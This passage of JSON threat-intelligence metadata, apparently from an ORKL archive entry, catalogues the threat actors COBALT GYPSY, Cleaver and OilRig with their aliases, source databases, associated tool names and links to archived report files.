"MailDropper", "SideTwist", "TWOTONE" ], "source_id": "Secureworks", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434767, "ts_updated_at": 1775792256, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/693e7f65b26b8441b3cbf4fa37ecec8a33c2be4a.pdf", "text": "https://archive.orkl.eu/693e7f65b26b8441b3cbf4fa37ecec8a33c2be4a.txt", "img": "https://archive.orkl.eu/693e7f65b26b8441b3cbf4fa37ecec8a33c2be4a.jpg" } }